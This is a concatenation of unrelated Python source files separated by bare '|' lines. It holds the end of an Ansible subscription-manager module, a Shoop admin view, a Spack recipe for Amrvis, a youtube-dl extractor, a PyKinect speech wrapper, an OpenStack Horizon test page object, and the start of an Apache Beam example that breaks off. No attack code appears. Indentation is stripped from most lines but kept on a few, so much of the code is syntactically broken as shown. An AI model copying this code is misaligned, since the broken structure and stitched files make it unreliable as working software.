args = [SUBMAN_CMD, 'unsubscribe'] + items
            rc, stdout, stderr = self.module.run_command(args, check_rc=True)
return serials
def unregister(self):
'''
Unregister a currently registered system
Raises:
* Exception - if error occurs while running command
'''
args = [SUBMAN_CMD, 'unregister']
        rc, stdout, stderr = self.module.run_command(args, check_rc=True)
self.update_plugin_conf('rhnplugin', False)
self.update_plugin_conf('subscription-manager', False)
def subscribe(self, regexp):
'''
Subscribe current system to available pools matching the specified
regular expression. It matches regexp against available pool ids first.
If any pool ids match, subscribe to those pools and return.
If no pool ids match, then match regexp against available pool product
names. Note this can still easily match many many pools. Then subscribe
to those pools.
Since a pool id is a more specific match, we only fallback to matching
against names if we didn't match pool ids.
Raises:
* Exception - if error occurs while running command
'''
# See https://github.com/ansible/ansible/issues/19466
# subscribe to pools whose pool id matches regexp (and only the pool id)
subscribed_pool_ids = self.subscribe_pool(regexp)
# If we found any matches, we are done
# Don't attempt to match pools by product name
if subscribed_pool_ids:
return subscribed_pool_ids
# We didn't match any pool ids.
# Now try subscribing to pools based on product name match
# Note: This can match lots of product names.
subscribed_by_product_pool_ids = self.subscribe_product(regexp)
if subscribed_by_product_pool_ids:
return subscribed_by_product_pool_ids
# no matches
return []
def subscribe_by_pool_ids(self, pool_ids):
for pool_id, quantity in pool_ids.items():
args = [SUBMAN_CMD, 'attach', '--pool', pool_id, '--quantity', quantity]
            rc, stdout, stderr = self.module.run_command(args, check_rc=True)
return pool_ids
def subscribe_pool(self, regexp):
'''
Subscribe current system to available pools matching the specified
regular expression
Raises:
* Exception - if error occurs while running command
'''
# Available pools ready for subscription
available_pools = RhsmPools(self.module)
subscribed_pool_ids = []
for pool in available_pools.filter_pools(regexp):
pool.subscribe()
subscribed_pool_ids.append(pool.get_pool_id())
return subscribed_pool_ids
def subscribe_product(self, regexp):
'''
Subscribe current system to available pools matching the specified
regular expression
Raises:
* Exception - if error occurs while running command
'''
# Available pools ready for subscription
available_pools = RhsmPools(self.module)
subscribed_pool_ids = []
for pool in available_pools.filter_products(regexp):
pool.subscribe()
subscribed_pool_ids.append(pool.get_pool_id())
return subscribed_pool_ids
def update_subscriptions(self, regexp):
changed = False
consumed_pools = RhsmPools(self.module, consumed=True)
pool_ids_to_keep = [p.get_pool_id() for p in consumed_pools.filter_pools(regexp)]
pool_ids_to_keep.extend([p.get_pool_id() for p in consumed_pools.filter_products(regexp)])
serials_to_remove = [p.Serial for p in consumed_pools if p.get_pool_id() not in pool_ids_to_keep]
serials = self.unsubscribe(serials=serials_to_remove)
subscribed_pool_ids = self.subscribe(regexp)
if subscribed_pool_ids or serials:
changed = True
return {'changed': changed, 'subscribed_pool_ids': subscribed_pool_ids,
'unsubscribed_serials': serials}
def update_subscriptions_by_pool_ids(self, pool_ids):
changed = False
consumed_pools = RhsmPools(self.module, consumed=True)
existing_pools = {}
for p in consumed_pools:
existing_pools[p.get_pool_id()] = p.QuantityUsed
serials_to_remove = [p.Serial for p in consumed_pools if pool_ids.get(p.get_pool_id(), 0) != p.QuantityUsed]
serials = self.unsubscribe(serials=serials_to_remove)
missing_pools = {}
for pool_id, quantity in pool_ids.items():
if existing_pools.get(pool_id, 0) != quantity:
missing_pools[pool_id] = quantity
self.subscribe_by_pool_ids(missing_pools)
if missing_pools or serials:
changed = True
return {'changed': changed, 'subscribed_pool_ids': missing_pools.keys(),
'unsubscribed_serials': serials}
class RhsmPool(object):
'''
Convenience class for housing subscription information
'''
def __init__(self, module, **kwargs):
self.module = module
for k, v in kwargs.items():
setattr(self, k, v)
def __str__(self):
return str(self.__getattribute__('_name'))
    def get_pool_id(self):
        # Output labels vary between subscription-manager versions; the
        # original eager getattr default raised AttributeError whenever
        # 'PoolID' was missing, even if 'PoolId' was present.
        return getattr(self, 'PoolId', None) or getattr(self, 'PoolID', None)
def subscribe(self):
args = "subscription-manager subscribe --pool %s" % self.get_pool_id()
rc, stdout, stderr = self.module.run_command(args, check_rc=True)
if rc == 0:
return True
else:
return False
class RhsmPools(object):
"""
This class is used for manipulating pools subscriptions with RHSM
"""
def __init__(self, module, consumed=False):
self.module = module
self.products = self._load_product_list(consumed)
def __iter__(self):
return self.products.__iter__()
def _load_product_list(self, consumed=False):
"""
Loads list of all available or consumed pools for system in data structure
Args:
consumed(bool): if True list consumed pools, else list available pools (default False)
"""
args = "subscription-manager list"
if consumed:
args += " --consumed"
else:
args += " --available"
rc, stdout, stderr = self.module.run_command(args, check_rc=True)
products = []
for line in stdout.split('\n'):
# Remove leading+trailing whitespace
line = line.strip()
            # An empty line implies the end of an output group
if len(line) == 0:
continue
# If a colon ':' is found, parse
elif ':' in line:
(key, value) = line.split(':', 1)
key = key.strip().replace(" ", "") # To unify
value = value.strip()
if key in ['ProductName', 'SubscriptionName']:
# Remember the name for later processing
products.append(RhsmPool(self.module, _name=value, key=value))
elif products:
# Associate value with most recently recorded product
products[-1].__setattr__(key, value)
# FIXME - log some warning?
# else:
# warnings.warn("Unhandled subscription key/value: %s/%s" % (key,value))
return products
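    # Parsing sketch: a 'subscription-manager list' block such as
    #   Subscription Name: Red Hat Enterprise Linux Server
    #   Pool ID:           0123456789abcdef0123456789abcdef
    #   Quantity Used:     1
    # becomes one RhsmPool with _name='Red Hat Enterprise Linux Server',
    # PoolID='0123456789abcdef0123456789abcdef' and QuantityUsed='1'
    # (labels keep their text but lose all whitespace).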
def filter_pools(self, regexp='^$'):
'''
Return a list of RhsmPools whose pool id matches the provided regular expression
'''
r = re.compile(regexp)
for product in self.products:
if r.search(product.get_pool_id()):
yield product
def filter_products(self, regexp='^$'):
'''
Return a list of RhsmPools whose product name matches the provided regular expression
'''
r = re.compile(regexp)
for product in self.products:
if r.search(product._name):
yield product
def main():
    # Rhsm needs an AnsibleModule; it is attached right after the module
    # object is constructed below.
rhsm = Rhsm(None)
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present',
choices=['present', 'absent']),
username=dict(default=None,
required=False),
password=dict(default=None,
required=False,
no_log=True),
server_hostname=dict(default=None,
required=False),
server_insecure=dict(default=None,
required=False),
rhsm_baseurl=dict(default=None,
required=False),
auto_attach=dict(aliases=['autosubscribe'], default=False, type='bool'),
activationkey=dict(default=None,
required=False,
no_log=True),
org_id=dict(default=None,
required=False),
environment=dict(default=None,
required=False, type='str'),
pool=dict(default='^$',
required=False,
type='str'),
pool_ids=dict(default=[],
required=False,
type='list'),
consumer_type=dict(default=None,
required=False),
consumer_name=dict(default=None,
required=False),
consumer_id=dict(default=None,
required=False),
force_register=dict(default=False,
type='bool'),
server_proxy_hostname=dict(default=None,
required=False),
server_proxy_port=dict(default=None,
required=False),
server_proxy_user=dict(default=None,
required=False),
server_proxy_password=dict(default=None,
required=False,
no_log=True),
),
required_together=[['username', 'password'],
['server_proxy_hostname', 'server_proxy_port'],
['server_proxy_user', 'server_proxy_password']],
        mutually_exclusive=[['activationkey', 'username'],
                            ['activationkey', 'consumer_id'],
                            ['activationkey', 'environment'],
                            # mutually_exclusive matches option names, not
                            # aliases, so use auto_attach / force_register
                            ['activationkey', 'auto_attach'],
                            ['force_register', 'consumer_id'],
                            ['pool', 'pool_ids']],
required_if=[['state', 'present', ['username', 'activationkey'], True]],
)
rhsm.module = module
state = module.params['state']
username = module.params['username']
password = module.params['password']
server_hostname = module.params['server_hostname']
server_insecure = module.params['server_insecure']
rhsm_baseurl = module.params['rhsm_baseurl']
auto_attach = module.params['auto_attach']
activationkey = module.params['activationkey']
org_id = module.params['org_id']
if activationkey and not org_id:
module.fail_json(msg='org_id is required when using activationkey')
environment = module.params['environment']
pool = module.params['pool']
pool_ids = {}
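    # Normalize mixed-form pool_ids, e.g.
    #   ['0123456789abcdef0123456789abcdef',
    #    {'1123456789abcdef0123456789abcdef': 2}]
    # into {'0123456789abcdef0123456789abcdef': '1',
    #       '1123456789abcdef0123456789abcdef': '2'}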
for value in module.params['pool_ids']:
if isinstance(value, dict):
if len(value) != 1:
module.fail_json(msg='Unable to parse pool_ids option.')
            pool_id, quantity = list(value.items())[0]  # dict.items() is a view on Python 3
else:
pool_id, quantity = value, 1
pool_ids[pool_id] = str(quantity)
consumer_type = module.params["consumer_type"]
consumer_name = module.params["consumer_name"]
consumer_id = module.params["consumer_id"]
force_register = module.params["force_register"]
server_proxy_hostname = module.params['server_proxy_hostname']
server_proxy_port = module.params['server_proxy_port']
server_proxy_user = module.params['server_proxy_user']
server_proxy_password = module.params['server_proxy_password']
global SUBMAN_CMD
SUBMAN_CMD = module.get_bin_path('subscription-manager', True)
# Ensure system is registered
if state == 'present':
# Register system
if rhsm.is_registered and not force_register:
if pool != '^$' or pool_ids:
try:
if pool_ids:
result = rhsm.update_subscriptions_by_pool_ids(pool_ids)
else:
result = rhsm.update_subscriptions(pool)
except Exception as e:
module.fail_json(msg="Failed to update subscriptions for '%s': %s" % (server_hostname, to_native(e)))
else:
module.exit_json(**result)
else:
module.exit_json(changed=False, msg="System already registered.")
else:
try:
rhsm.enable()
rhsm.configure(**module.params)
rhsm.register(username, password, auto_attach, activationkey, org_id,
consumer_type, consumer_name, consumer_id, force_register,
environment, rhsm_baseurl, server_insecure, server_hostname,
server_proxy_hostname, server_proxy_port, server_proxy_user, server_proxy_password)
if pool_ids:
subscribed_pool_ids = rhsm.subscribe_by_pool_ids(pool_ids)
else:
subscribed_pool_ids = rhsm.subscribe(pool)
except Exception as e:
module.fail_json(msg="Failed to register with '%s': %s" % (server_hostname, to_native(e)))
else:
module.exit_json(changed=True,
msg="System successfully registered to '%s'." % server_hostname,
subscribed_pool_ids=subscribed_pool_ids)
# Ensure system is *not* registered
if state == 'absent':
if not rhsm.is_registered:
module.exit_json(changed=False, msg="System already unregistered.")
else:
try:
rhsm.unsubscribe()
rhsm.unregister()
except Exception as e:
module.fail_json(msg="Failed to unregister: %s" % to_native(e))
else:
module.exit_json(changed=True, msg="System successfully unregistered from %s." % server_hostname)
if __name__ == '__main__':
main()
|
from __future__ import unicode_literals
import six
from django.utils.translation import ugettext_lazy as _
from django.views.generic.detail import DetailView
from shoop.core.models import PaymentMethod, ShippingMethod
from shoop.utils.excs import Problem
from shoop.utils.importing import load
class _BaseMethodDetailView(DetailView):
model = None # Overridden below
title = _(u"Edit Details")
def dispatch(self, request, *args, **kwargs):
# This view only dispatches further to the method module's own detail view class
object = self.get_object()
module = object.module
if not module.admin_detail_view_class:
raise Problem("Module %s has no admin detail view" % module.name)
if isinstance(module.admin_detail_view_class, six.text_type):
view_class = load(module.admin_detail_view_class)
else:
view_class = module.admin_detail_view_class
kwargs["object"] = object
return view_class(model=self.model).dispatch(request, *args, **kwargs)
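# The concrete views below only pin down the model; the actual form logic is
# supplied by the method module, whose admin_detail_view_class may be either a
# dotted-path string (lazily imported via load() above) or a view class.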
class ShippingMethodEditDetailView(_BaseMethodDetailView):
model = ShippingMethod
class PaymentMethodEditDetailView(_BaseMethodDetailView):
model = PaymentMethod
|
# Assumed preamble: Spack packages get version/variant/depends_on/resource and
# the build helpers (FileFilter, join_path, mkdirp, install) from this import.
from spack import *


class Amrvis(MakefilePackage):
"""Amrvis is a visualization package specifically designed to
read and display output and profiling data from codes built
on the AMReX framework.
"""
homepage = "https://github.com/AMReX-Codes/Amrvis"
git = "https://github.com/AMReX-Codes/Amrvis.git"
version('main', tag='main')
variant(
'dims',
default='3',
values=('1', '2', '3'),
multi=False,
description='Number of spatial dimensions'
)
variant(
'prec',
default='DOUBLE',
values=('FLOAT', 'DOUBLE'),
multi=False,
description='Floating point precision'
)
variant('mpi', default=True, description='Enable MPI parallel support')
variant('debug', default=False, description='Enable debugging features')
variant('profiling', default=False,
description='Enable AMReX profiling features')
depends_on('gmake', type='build')
depends_on('mpi', when='+mpi')
depends_on('libsm')
depends_on('libice')
depends_on('libxpm')
depends_on('libx11')
depends_on('libxt')
depends_on('libxext')
depends_on('motif')
depends_on('flex')
depends_on('bison')
conflicts(
'+profiling', when='dims=1',
msg='Amrvis profiling support requires a 2D build'
)
conflicts(
'+profiling', when='dims=3',
msg='Amrvis profiling support requires a 2D build'
)
# Only doing gcc and clang at the moment.
# Intel currently fails searching for mpiicc, mpiicpc, etc.
for comp in ['%intel', '%cce', '%nag', '%pgi', '%xl', '%xl_r']:
conflicts(
comp,
msg='Amrvis currently only builds with gcc and clang'
)
# Need to clone AMReX into Amrvis because Amrvis uses AMReX's source
resource(name='amrex',
git='https://github.com/AMReX-Codes/amrex.git',
tag='development',
placement='amrex')
def edit(self, spec, prefix):
        # libquadmath is only available on x86_64 and ppc64le
# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=85440
if self.spec.target.family not in ['x86_64', 'ppc64le']:
comps = join_path('amrex', 'Tools', 'GNUMake', 'comps')
maks = [
join_path(comps, 'gnu.mak'),
join_path(comps, 'llvm.mak'),
]
for mak in maks:
filter_file('-lquadmath', '', mak)
# Set all available makefile options to values we want
makefile = FileFilter('GNUmakefile')
makefile.filter(
r'^AMREX_HOME\s*\?=.*',
'AMREX_HOME = {0}'.format('./amrex')
)
makefile.filter(
r'^PRECISION\s*=.*',
'PRECISION = {0}'.format(spec.variants['prec'].value)
)
makefile.filter(
r'^DIM\s*=.*',
'DIM = {0}'.format(spec.variants['dims'].value)
)
makefile.filter(
r'^PROFILE\s*=.*',
'PROFILE = {0}'.format(
spec.variants['profiling'].value
).upper()
)
makefile.filter(
r'^TRACE_PROFILE\s*=.*',
'TRACE_PROFILE = {0}'.format(
spec.variants['profiling'].value
).upper()
)
makefile.filter(
r'^COMM_PROFILE\s*=.*',
'COMM_PROFILE = {0}'.format(
spec.variants['profiling'].value
).upper()
)
makefile.filter(
r'^COMP\s*=.*',
'COMP = {0}'.format(self.compiler.name)
)
makefile.filter(
r'^DEBUG\s*=.*',
'DEBUG = {0}'.format(spec.variants['debug'].value).upper()
)
makefile.filter(
r'^USE_ARRAYVIEW\s*=.*',
            'USE_ARRAYVIEW = FALSE'
)
makefile.filter(
r'^USE_MPI\s*=.*',
'USE_MPI = {0}'.format(spec.variants['mpi'].value).upper()
)
makefile.filter(
r'^USE_CXX11\s*=.*',
'USE_CXX11 = TRUE'
)
makefile.filter(
r'^USE_VOLRENDER\s*=.*',
'USE_VOLRENDER = FALSE'
)
makefile.filter(
r'^USE_PARALLELVOLRENDER\s*=.*',
'USE_PARALLELVOLRENDER = FALSE'
)
makefile.filter(
r'^USE_PROFPARSER\s*=.*',
'USE_PROFPARSER = {0}'.format(
spec.variants['profiling'].value
).upper()
)
# A bit risky here deleting all /usr and /opt X
# library default search paths in makefile
makefile.filter(
r'^.*\b(usr|opt)\b.*$',
'# Spack removed INCLUDE_LOCATIONS and LIBRARY_LOCATIONS'
)
# Read GNUmakefile into array
with open('GNUmakefile', 'r') as file:
contents = file.readlines()
# Edit GNUmakefile includes and libraries to point to Spack
# dependencies.
# The safest bet is to put the LIBRARY_LOCATIONS and
# INCLUDE_LOCATIONS at the beginning of the makefile.
line_offset = 0
count = 0
for lib in ['libsm', 'libice', 'libxpm', 'libx11',
'libxt', 'libxext', 'motif']:
contents.insert(
line_offset + count,
'LIBRARY_LOCATIONS += {0}\n'.format(spec[lib].prefix.lib)
)
contents.insert(
line_offset + count + 1,
'INCLUDE_LOCATIONS += {0}\n'.format(spec[lib].prefix.include)
)
count += 1
# Write GNUmakefile
with open('GNUmakefile', 'w') as file:
file.writelines(contents)
def setup_build_environment(self, env):
# We don't want an AMREX_HOME the user may have set already
env.unset('AMREX_HOME')
# Help force Amrvis to not pick up random system compilers
if '+mpi' in self.spec:
env.set('MPI_HOME', self.spec['mpi'].prefix)
env.set('CC', self.spec['mpi'].mpicc)
env.set('CXX', self.spec['mpi'].mpicxx)
env.set('F77', self.spec['mpi'].mpif77)
env.set('FC', self.spec['mpi'].mpifc)
def install(self, spec, prefix):
# Install exe manually
mkdirp(prefix.bin)
install('*.ex', prefix.bin)
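    # A minimal usage sketch (not part of this recipe); the spec below is
    # illustrative Spack CLI variant syntax, not a tested invocation. Note
    # +profiling requires dims=2 per the conflicts declared above:
    #
    #   spack install amrvis dims=2 prec=DOUBLE +mpi ~debug +profiling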
|
import re
from .common import InfoExtractor
class TrailerAddictIE(InfoExtractor):
_VALID_URL = r'(?:http://)?(?:www\.)?traileraddict\.com/(?:trailer|clip)/(?P<movie>.+?)/(?P<trailer_name>.+)'
_TEST = {
u'url': u'http://www.traileraddict.com/trailer/prince-avalanche/trailer',
u'file': u'76184.mp4',
u'md5': u'57e39dbcf4142ceb8e1f242ff423fd71',
u'info_dict': {
u"title": u"Prince Avalanche Trailer",
u"description": u"Trailer for Prince Avalanche.Two highway road workers spend the summer of 1988 away from their city lives. The isolated landscape becomes a place of misadventure as the men find themselves at odds with each other and the women they left behind."
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
name = mobj.group('movie') + '/' + mobj.group('trailer_name')
webpage = self._download_webpage(url, name)
        title = self._search_regex(r'<title>(.+?)</title>',
                webpage, 'video title').replace(' - Trailer Addict', '')
view_count = self._search_regex(r'Views: (.+?)<br />',
webpage, 'Views Count')
video_id = self._og_search_property('video', webpage, 'Video id').split('=')[1]
# Presence of (no)watchplus function indicates HD quality is available
        if re.search(r'function (no)?watchplus\(\)', webpage):
fvar = "fvarhd"
else:
fvar = "fvar"
info_url = "http://www.traileraddict.com/%s.php?tid=%s" % (fvar, str(video_id))
        info_webpage = self._download_webpage(info_url, video_id, "Downloading the info webpage")
final_url = self._search_regex(r'&fileurl=(.+)',
info_webpage, 'Download url').replace('%3F','?')
thumbnail_url = self._search_regex(r'&image=(.+?)&',
info_webpage, 'thumbnail url')
ext = final_url.split('.')[-1].split('?')[0]
        return [{
            'id': video_id,
            'url': final_url,
            'ext': ext,
            'title': title,
            'thumbnail': thumbnail_url,
            'description': self._og_search_description(webpage),
            'view_count': view_count,
        }]
|
import os
import ctypes
from os import path
_audio_path = path.join(path.dirname(__file__), '..', 'pykinect', 'audio', 'PyKinectAudio.dll')
if not path.exists(_audio_path):
_audio_path = path.join(path.dirname(__file__), '..', '..', '..', '..', '..', '..', 'Binaries', 'Debug', 'PyKinectAudio.dll')
if not path.exists(_audio_path):
raise Exception('Cannot find PyKinectAudio.dll')
_PYAUDIODLL = ctypes.CDLL(_audio_path)
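# Declare argtypes and restype for each export up front so ctypes marshals
# arguments correctly; an HRESULT restype makes failing calls raise an error.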
_CreateRecognizer = _PYAUDIODLL.CreateRecognizer
_CreateRecognizer.argtypes = [ctypes.c_voidp, ctypes.POINTER(ctypes.c_voidp)]
_CreateRecognizer.restype = ctypes.HRESULT
_SetInputFile = _PYAUDIODLL.SetInputFile
_SetInputFile.argtypes = [ctypes.c_voidp, ctypes.c_voidp]
_SetInputFile.restype = ctypes.HRESULT
_SetInputStream = _PYAUDIODLL.SetInputStream
_SetInputStream.argtypes = [ctypes.c_voidp, ctypes.c_voidp]
_SetInputStream.restype = ctypes.HRESULT
_IUnknownRelease = _PYAUDIODLL.IUnknownRelease
_IUnknownRelease.argtypes = [ctypes.c_voidp]
_IUnknownRelease.restype = None
_LoadGrammar = _PYAUDIODLL.LoadGrammar
_LoadGrammar.argtypes = [ctypes.c_wchar_p, ctypes.c_voidp, ctypes.POINTER(ctypes.c_voidp)]
_LoadGrammar.restype = ctypes.HRESULT
_EnumRecognizers = _PYAUDIODLL.EnumRecognizers
_ReadCallback = ctypes.WINFUNCTYPE(ctypes.HRESULT, ctypes.c_uint32, ctypes.c_voidp, ctypes.POINTER(ctypes.c_uint32))
_Recognize_Callback = ctypes.WINFUNCTYPE(None, ctypes.c_wchar_p)
_RecognizeOne = _PYAUDIODLL.RecognizeOne
_RecognizeOne.argtypes = [ctypes.c_voidp, ctypes.c_uint32, _Recognize_Callback, _Recognize_Callback]
_RecognizeOne.restype = ctypes.HRESULT
_RecognizeAsync = _PYAUDIODLL.RecognizeAsync
_RecognizeAsync.argtypes = [ctypes.c_voidp, ctypes.c_uint, _Recognize_Callback, _Recognize_Callback, ctypes.POINTER(ctypes.c_voidp)]
_RecognizeAsync.restype = ctypes.HRESULT
_StopRecognizeAsync = _PYAUDIODLL.StopRecognizeAsync
_StopRecognizeAsync.argtypes = [ctypes.c_voidp]
_StopRecognizeAsync.restype = ctypes.HRESULT
_EnumRecognizersCallback = ctypes.WINFUNCTYPE(None, ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_voidp)
class Grammar(object):
"""Represents a speech grammar constructed from an XML file"""
def __init__(self, filename):
self.filename = filename
def __del__(self):
#_IUnknownRelease(self._reco_ctx)
_IUnknownRelease(self._grammar)
class RecognizerInfo(object):
def __init__(self, id, description, token):
self.id = id
self.description = description
self._token = token
def __del__(self):
_IUnknownRelease(self._token)
def __repr__(self):
return 'RecognizerInfo(%r, %r, ...)' % (self.id, self.description)
class RecognitionResult(object):
    def __init__(self, text, alternates=None):
self.text = text
if alternates:
self.alternates = tuple(RecognitionResult(alt) for alt in alternates)
else:
self.alternates = ()
class _event(object):
"""class used for adding/removing/invoking a set of listener functions"""
__slots__ = ['handlers']
def __init__(self):
self.handlers = []
def __iadd__(self, other):
self.handlers.append(other)
return self
def __isub__(self, other):
self.handlers.remove(other)
return self
def fire(self, *args):
for handler in self.handlers:
handler(*args)
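    # Usage sketch (not part of the original class): listeners subscribe with
    # `some_event += handler` and fire(*args) calls each handler in order.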
class RecognitionEventArgs(object):
"""Provides information about speech recognition events."""
def __init__(self, result):
self.result = result
class SpeechRecognitionEngine(object):
"""Provides the means to access and manage an in-process speech recognition engine."""
    def __init__(self, recognizer=None):
self.speech_recognized = _event()
self._async_handle = None
if isinstance(recognizer, str):
# TODO: Lookup by ID
pass
elif isinstance(recognizer, RecognizerInfo):
rec = ctypes.c_voidp()
_CreateRecognizer(recognizer._token, ctypes.byref(rec))
self._rec = rec
elif recognizer is None:
rec = ctypes.c_voidp()
_CreateRecognizer(None, ctypes.byref(rec))
self._rec = rec
else:
raise TypeError('Bad type for recognizer: ' + repr(recognizer))
def __del__(self):
# TODO: Need to shut down any listening threads
self.recognize_async_stop()
_IUnknownRelease(self._rec)
def load_grammar(self, grammar):
if isinstance(grammar, str):
grammar_obj = Grammar(grammar)
else:
grammar_obj = grammar
comGrammar = ctypes.c_voidp()
_LoadGrammar(grammar_obj.filename, self._rec, ctypes.byref(comGrammar))
grammar_obj._grammar = comGrammar
return grammar_obj
def set_input_to_audio_file(self, stream):
"""sets the input to a Python file-like object which implements read"""
stream_obj = getattr(stream, '__ISpStreamFormat__', None)
if stream_obj is not None:
# optimization: we can avoid going through Python to do the reading by passing
# the original ISpStreamFormat object through
_SetInputStream(self._rec, stream_obj)
else:
            def reader(byteCount, buffer, bytesRead):
                data = stream.read(byteCount)  # avoid shadowing the `bytes` builtin
                ctypes.memmove(buffer, data, len(data))
                bytesRead.contents.value = len(data)
                return 0
self._reader = _ReadCallback(reader)
_SetInputFile(self._rec, self._reader)
    def recognize_sync(self, timeout=30000):
"""attempts to recognize speech and returns the recognized text.
By default times out after 30 seconds"""
res = []
alts = []
def callback(text):
res.append(text)
def alt_callback(text):
if text is not None:
alts.append(text)
_RecognizeOne(self._rec, timeout, _Recognize_Callback(callback), _Recognize_Callback(alt_callback))
if res:
return RecognitionResult(res[0], alts)
return None
    def recognize_async(self, multiple=False):
cur_result = []
def callback(text):
cur_result.append(text)
def alt_callback(text):
            if text is None:
# send the event
result = RecognitionResult(cur_result[0], cur_result[1:])
event_args = RecognitionEventArgs(result)
self.speech_recognized.fire(event_args)
del cur_result[:]
else:
cur_result.append(text)
stop_listening_handle = ctypes.c_voidp()
# keep alive our function pointers on ourselves...
        self._async_callback = async_callback = _Recognize_Callback(callback)
self._async_alt_callback = async_alt_callback = _Recognize_Callback(alt_callback)
_RecognizeAsync(self._rec, multiple, async_callback, async_alt_callback, ctypes.byref(stop_listening_handle))
self._async_handle = stop_listening_handle
def recognize_async_stop(self):
if self._async_handle is not None:
_StopRecognizeAsync(self._async_handle)
self._async_handle = None
@staticmethod
def installed_recognizers():
ids = []
def callback(id, description, token):
ids.append(RecognizerInfo(id, description, token))
_EnumRecognizers(_EnumRecognizersCallback(callback))
return ids
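# A minimal usage sketch (not part of the original module); the grammar XML
# and WAV file names are hypothetical placeholders, and running it requires
# PyKinectAudio.dll to be loadable.
def _example_recognize_from_file():
    engine = SpeechRecognitionEngine()
    engine.load_grammar('commands.xml')
    with open('speech.wav', 'rb') as stream:
        engine.set_input_to_audio_file(stream)
        result = engine.recognize_sync(timeout=10000)
    if result is not None:
        print(result.text)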
|
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages.project.compute.volumes.\
volumespage import VolumesPage
from openstack_dashboard.test.integration_tests.regions import forms
from openstack_dashboard.test.integration_tests.regions import tables
class VolumesnapshotsTable(tables.TableRegion):
name = 'volume_snapshots'
marker_name = 'snapshot_marker'
prev_marker_name = 'prev_snapshot_marker'
EDIT_SNAPSHOT_FORM_FIELDS = ("name", "description")
CREATE_VOLUME_FORM_FIELDS = (
"name", "description", "snapshot_source", "type", "size")
@tables.bind_table_action('delete')
def delete_volume_snapshots(self, delete_button):
"""Batch Delete table action."""
delete_button.click()
return forms.BaseFormRegion(self.driver, self.conf)
@tables.bind_row_action('delete')
def delete_volume_snapshot(self, delete_button, row):
"""Per-entity delete row action."""
delete_button.click()
return forms.BaseFormRegion(self.driver, self.conf)
@tables.bind_row_action('edit')
def edit_snapshot(self, edit_button, row):
edit_button.click()
return forms.FormRegion(self.driver, self.conf,
field_mappings=self.EDIT_SNAPSHOT_FORM_FIELDS)
@tables.bind_row_action('create_from_snapshot')
def create_volume(self, create_volume_button, row):
create_volume_button.click()
return forms.FormRegion(self.driver, self.conf,
field_mappings=self.CREATE_VOLUME_FORM_FIELDS)
class VolumesnapshotsPage(basepage.BaseNavigationPage):
SNAPSHOT_TABLE_NAME_COLUMN = 'name'
SNAPSHOT_TABLE_STATUS_COLUMN = 'status'
SNAPSHOT_TABLE_VOLUME_NAME_COLUMN = 'volume_name'
_volumes_tab_locator = (
by.By.CSS_SELECTOR,
'a[href*="tab=volumes_and_snapshots__volumes_tab"]')
def __init__(self, driver, conf):
super(VolumesnapshotsPage, self).__init__(driver, conf)
self._page_title = "Volumes"
@property
def volumesnapshots_table(self):
return VolumesnapshotsTable(self.driver, self.conf)
def switch_to_volumes_tab(self):
self._get_element(*self._volumes_tab_locator).click()
return VolumesPage(self.driver, self.conf)
def _get_row_with_volume_snapshot_name(self, name):
return self.volumesnapshots_table.get_row(
self.SNAPSHOT_TABLE_NAME_COLUMN,
name)
def is_snapshot_present(self, name):
return bool(self._get_row_with_volume_snapshot_name(name))
def delete_volume_snapshot(self, name):
row = self._get_row_with_volume_snapshot_name(name)
confirm_form = self.volumesnapshots_table.delete_volume_snapshot(row)
confirm_form.submit()
def delete_volume_snapshots(self, names):
for name in names:
row = self._get_row_with_volume_snapshot_name(name)
row.mark()
confirm_form = self.volumesnapshots_table.delete_volume_snapshots()
confirm_form.submit()
def is_volume_snapshot_deleted(self, name):
return self.volumesnapshots_table.is_row_deleted(
lambda: self._get_row_with_volume_snapshot_name(name))
def is_volume_snapshot_available(self, name):
def cell_getter():
row = self._get_row_with_volume_snapshot_name(name)
return row and row.cells[self.SNAPSHOT_TABLE_STATUS_COLUMN]
return bool(self.volumesnapshots_table.wait_cell_status(cell_getter,
'Available'))
def get_volume_name(self, snapshot_name):
row = self._get_row_with_volume_snapshot_name(snapshot_name)
return row.cells[self.SNAPSHOT_TABLE_VOLUME_NAME_COLUMN].text
def edit_snapshot(self, name, new_name=None, description=None):
row = self._get_row_with_volume_snapshot_name(name)
snapshot_edit_form = self.volumesnapshots_table.edit_snapshot(row)
if new_name:
snapshot_edit_form.name.text = new_name
if description:
snapshot_edit_form.description.text = description
snapshot_edit_form.submit()
def create_volume_from_snapshot(self, snapshot_name, volume_name=None,
description=None, volume_size=None):
row = self._get_row_with_volume_snapshot_name(snapshot_name)
volume_form = self.volumesnapshots_table.create_volume(row)
if volume_name:
volume_form.name.text = volume_name
if description:
volume_form.description.text = description
if volume_size is None:
volume_size = self.conf.volume.volume_size
volume_form.size.value = volume_size
volume_form.submit()
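# A minimal sketch (not part of the original page module) of how a test might
# drive this page object; `page` is a VolumesnapshotsPage provided by the
# integration-test harness, and the snapshot name is hypothetical.
def _example_snapshot_workflow(page):
    assert page.is_snapshot_present('snapshot-1')
    page.create_volume_from_snapshot('snapshot-1', volume_name='volume-1')
    page.delete_volume_snapshot('snapshot-1')
    assert page.is_volume_snapshot_deleted('snapshot-1')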
|
"""An example that verifies the counts and includes best practices.
On top of the basic concepts in the wordcount example, this workflow introduces
logging to Cloud Logging and the use of assertions in a Dataflow pipeline.
To execute this pipeline locally, specify a local output file or output prefix
on GCS::
--output [YOUR_LOCAL_FILE | gs://YOUR_OUTPUT_PREFIX]
To execute this pipeline using the Google Cloud Dataflow service, specify
pipeline configuration::
--project YOUR_PROJECT_ID
--staging_location gs://YOUR_STAGING_DIRECTORY
--temp_location gs://YOUR_TEMP_DIRECTORY
--job_name YOUR_JOB_NAME
--runner DataflowRunner
and an output prefix on GCS::
--output gs://YOUR_OUTPUT_PREFIX
"""
from __future__ import absolute_import
import argparse
import logging
import re
from past.builtins import unicode
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
class FilterTextFn(beam.DoFn):
"""A DoFn that filters for a specific key based on a regular expression."""
def __init__(self, pattern):
super(FilterTextFn, self).__init__()
self.pattern = pattern
# A custom metric can track values in your pipeline as it runs. Those
# values will be available in the monitoring system of the runner used
